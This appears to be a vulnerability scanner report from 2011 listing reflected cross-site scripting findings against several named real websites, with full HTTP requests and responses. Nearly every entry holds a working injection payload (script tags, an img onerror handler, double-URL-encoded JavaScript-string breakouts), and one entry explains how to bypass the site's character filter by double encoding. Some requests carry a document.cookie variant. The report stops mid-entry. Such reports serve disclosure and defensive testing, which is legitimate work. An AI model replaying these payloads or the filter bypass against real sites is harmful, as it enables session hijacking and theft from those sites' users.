GET /red/psi/sites/www.klivio.com/p.json?callback=_ate.ad.hpr7a43e<script>alert(1)</script>9a66bdcec19&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.klivio.com%2F%3F34aa6%2522%253E%253Cscript%253Ealert(String.fromCharCode(88%2C83%2C83))%253C%2Fscript%253Eceac919ade3%3D1&ref=http%3A%2F%2Fburp%2Fshow%2F69&fb5wa3 HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh31.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296924137.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 131 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 06 Feb 2011 16:16:53 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 08 Mar 2011 16:16:53 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Sun, 06 Feb 2011 16:16:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 06 Feb 2011 16:16:53 GMT Connection: close
The value of the bg1 request parameter is copied into the HTML document as plain text between tags. The payload 6b18f<script>alert(1)</script>3e30c6ee661 was submitted in the bg1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C&header_text_color=ffffff&header_bg=838893&bg1=FFFFFF6b18f<script>alert(1)</script>3e30c6ee661&bg2=ECECEC&border=CEDBEB HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the bg2 request parameter is copied into the HTML document as plain text between tags. The payload fa455<script>alert(1)</script>a267106d572 was submitted in the bg2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C&header_text_color=ffffff&header_bg=838893&bg1=FFFFFF&bg2=ECECECfa455<script>alert(1)</script>a267106d572&border=CEDBEB HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the border request parameter is copied into the HTML document as plain text between tags. The payload b277e<script>alert(1)</script>0c9da3d43ac was submitted in the border parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C&header_text_color=ffffff&header_bg=838893&bg1=FFFFFF&bg2=ECECEC&border=CEDBEBb277e<script>alert(1)</script>0c9da3d43ac HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the header_bg request parameter is copied into the HTML document as plain text between tags. The payload cf11a<script>alert(1)</script>b223fafe30f was submitted in the header_bg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C&header_text_color=ffffff&header_bg=838893cf11a<script>alert(1)</script>b223fafe30f&bg1=FFFFFF&bg2=ECECEC&border=CEDBEB HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the header_text_color request parameter is copied into the HTML document as plain text between tags. The payload b0d61<script>alert(1)</script>541aa12ac86 was submitted in the header_text_color parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C&header_text_color=ffffffb0d61<script>alert(1)</script>541aa12ac86&header_bg=838893&bg1=FFFFFF&bg2=ECECEC&border=CEDBEB HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
4.52. http://ecal.forexpros.com/e_cal.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ecal.forexpros.com
Path:
/e_cal.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f1513<script>alert(1)</script>4215d583f88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C&header_text_color=ffffff&header_bg=838893&bg1=FFFFFF&bg2=ECECEC&border=CE/f1513<script>alert(1)</script>4215d583f88DBEB HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the top_bg request parameter is copied into the HTML document as plain text between tags. The payload 48257<script>alert(1)</script>6e0a41b399b was submitted in the top_bg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF&top_bg=4E505C48257<script>alert(1)</script>6e0a41b399b&header_text_color=ffffff&header_bg=838893&bg1=FFFFFF&bg2=ECECEC&border=CEDBEB HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the top_text_color request parameter is copied into the HTML document as plain text between tags. The payload 9fd66<script>alert(1)</script>2df195dea04 was submitted in the top_text_color parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e_cal.php?duration=daily&top_text_color=FFFFFF9fd66<script>alert(1)</script>2df195dea04&top_bg=4E505C&header_text_color=ffffff&header_bg=838893&bg1=FFFFFF&bg2=ECECEC&border=CEDBEB HTTP/1.1 Host: ecal.forexpros.com Proxy-Connection: keep-alive Referer: http://dws1.etoro.com/ApplicationServices/Calendar/?rows=13&cid=1&pid=1&URL=http%3A//www.etoro.com/B1025_A19968_TClick.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 433e1"><img%20src%3da%20onerror%3dalert(1)>bbd0b8b028e was submitted in the REST URL parameter 1. This input was echoed as 433e1"><img src=a onerror=alert(1)>bbd0b8b028e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /tools433e1"><img%20src%3da%20onerror%3dalert(1)>bbd0b8b028e/overlay.html HTTP/1.1 Host: flowplayer.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Prefer web standards over Flash. Video is the only exception (f ...[SNIP]... <body id="tools433e1"><img src=a onerror=alert(1)>bbd0b8b028e_overlay" class="msie tools"> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 47888%2527%253balert%25281%2529%252f%252f8fcf167d281 was submitted in the REST URL parameter 5. This input was echoed as 47888';alert(1)//8fcf167d281 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ex/mfg/headline/m/ariens47888%2527%253balert%25281%2529%252f%252f8fcf167d281/d/type/product_problem HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:52:01 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47013
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... 1',false,{ titleHTML:'', sCustomFPWScope:'' });
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a19b%2527%253balert%25281%2529%252f%252f35f276845e was submitted in the REST URL parameter 7. This input was echoed as 1a19b';alert(1)//35f276845e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ex/mfg/headline/m/ariens/d/type1a19b%2527%253balert%25281%2529%252f%252f35f276845e/product_problem HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:52:33 GMT Server: Apache/2.2.14 (Fedora) X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 45867
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... ert(1)//35f276845e', 'Ariens',false,{ titleHTML:'', sCustomFPWScope:'' });
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50f52%2527%253balert%25281%2529%252f%252f293c700832d was submitted in the REST URL parameter 5. This input was echoed as 50f52';alert(1)//293c700832d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ex/mfg/headline/m/ariens50f52%2527%253balert%25281%2529%252f%252f293c700832d/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c4ee%2527%253balert%25281%2529%252f%252f94f30994ebc was submitted in the REST URL parameter 7. This input was echoed as 2c4ee';alert(1)//94f30994ebc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ex/mfg/headline/m/ariens/d/type1a19b%252527%25253balert%2525281%252529%25252f%25252f35f276845e2c4ee%2527%253balert%25281%2529%252f%252f94f30994ebc/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFHyAxyRcv5LqEhS2qHXwW0t83rLQ/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60be1%2527%253balert%25281%2529%252f%252f5596dc43a2 was submitted in the REST URL parameter 7. This input was echoed as 60be1';alert(1)//5596dc43a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ex/mfg/headline/m/ariens/d/60be1%2527%253balert%25281%2529%252f%252f5596dc43a2/product_problem/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 990de%2527%253balert%25281%2529%252f%252fa6bd97b8f6e was submitted in the REST URL parameter 5. This input was echoed as 990de';alert(1)//a6bd97b8f6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281990de%2527%253balert%25281%2529%252f%252fa6bd97b8f6e/d/type/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=26; __utmz=162857765.1296956996.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=5378e2dc-3193-11e0-bdbb-0030485f67c6; adsust=n1; adsus=26b9sk; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296956996.2; __utmc=162857765; __utmb=162857765.1.10.1296956996;
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83c99%2527%253balert%25281%2529%252f%252f366fb95dad1 was submitted in the REST URL parameter 7. This input was echoed as 83c99';alert(1)//366fb95dad1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type83c99%2527%253balert%25281%2529%252f%252f366fb95dad1/product_problem&hl=en&client=ca-pub-4582869284305424&adU=www.Rackspace.com/Exchange_Hosting&adT=ImageAd&gl=US&usg=AFQjCNFt7K-JBKpz6-rzEu72zZg5MwT1cg/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=26; __utmz=162857765.1296956996.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=5378e2dc-3193-11e0-bdbb-0030485f67c6; adsust=n1; adsus=26b9sk; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296956996.2; __utmc=162857765; __utmb=162857765.1.10.1296956996;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97252%2527%253balert%25281%2529%252f%252f65b1cc71132 was submitted in the REST URL parameter 5. This input was echoed as 97252';alert(1)//65b1cc71132 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ex/mfg/headline/m/97252%2527%253balert%25281%2529%252f%252f65b1cc71132/d/type/product_problem/ HTTP/1.1 Host: homeappliance.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; __utmz=162857765.1296942825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z; PAPVisitorId=c21ce48b6f65fadb04f522bba10uSpNn; __utma=162857765.1785005893.1296942825.1296942825.1296942825.1; __utmc=162857765; __utmb=162857765.2.10.1296942825;
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a620c"%3balert(1)//7fca9867605 was submitted in the mpck parameter. This input was echoed as a620c";alert(1)//7fca9867605 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/14302/119028/OI_revised_60days_baker_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-23636-2%3Fmpt%3D%5BCACHEBUSTER%5Da620c"%3balert(1)//7fca9867605&mpjs=puma.vizu.com%2Fcdn%2F00%2F00%2F14%2F09%2Ftracking_only.js%3Fadid%3Demm%3Bsiteid%3Downeriq%3B&mpt=[CACHEBUSTER]&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/o%3B235018855%3B0-0%3B0%3B41185174%3B2321-160/600%3B40066933/40084720/1%3Bu%3Dsid_%3B%7Esscs%3D%3f&placementid=14302119028236362& HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:26:17 GMT Server: Apache Last-Modified: Thu, 13 Jan 2011 22:58:30 GMT ETag: "401ef4-cdb-499c241979180" Accept-Ranges: bytes Content-Length: 6164 Content-Type: application/x-javascript
The value of the mpjs request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75f94"%3balert(1)//6b802c89842 was submitted in the mpjs parameter. This input was echoed as 75f94";alert(1)//6b802c89842 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/14302/119028/OI_revised_60days_baker_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-23636-2%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=puma.vizu.com%2Fcdn%2F00%2F00%2F14%2F09%2Ftracking_only.js%3Fadid%3Demm%3Bsiteid%3Downeriq%3B75f94"%3balert(1)//6b802c89842&mpt=[CACHEBUSTER]&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/o%3B235018855%3B0-0%3B0%3B41185174%3B2321-160/600%3B40066933/40084720/1%3Bu%3Dsid_%3B%7Esscs%3D%3f&placementid=14302119028236362& HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=14302:23636/4608:12284/16228:10420/15017:34880/9609:2042/11606:17922/1551:17023/11293:3113
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:26:23 GMT Server: Apache Last-Modified: Thu, 13 Jan 2011 22:58:30 GMT ETag: "401ef4-cdb-499c241979180" Accept-Ranges: bytes Content-Length: 5804 Content-Type: application/x-javascript
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47ebf"%3balert(1)//9d047a6ebcf was submitted in the mpvc parameter. This input was echoed as 47ebf";alert(1)//9d047a6ebcf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
